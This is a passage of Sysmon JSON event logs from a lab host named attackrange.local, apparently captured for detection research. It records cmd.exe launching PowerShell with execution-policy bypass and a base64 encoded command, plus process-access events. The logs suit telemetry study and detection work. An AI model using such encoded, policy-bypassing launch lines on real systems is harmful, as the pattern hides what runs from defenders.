QwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nParentProcessId: 4448\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","ProcessGuid":"{A837DB8D-032A-5F25-0000-001080C20900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-0010B5C10900}","ParentProcessId":"4448","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nSourceProcessId: 4448\r\nSourceThreadId: 1008\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-0010B5C10900}","SourceProcessId":"4448","SourceThreadId":"1008","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 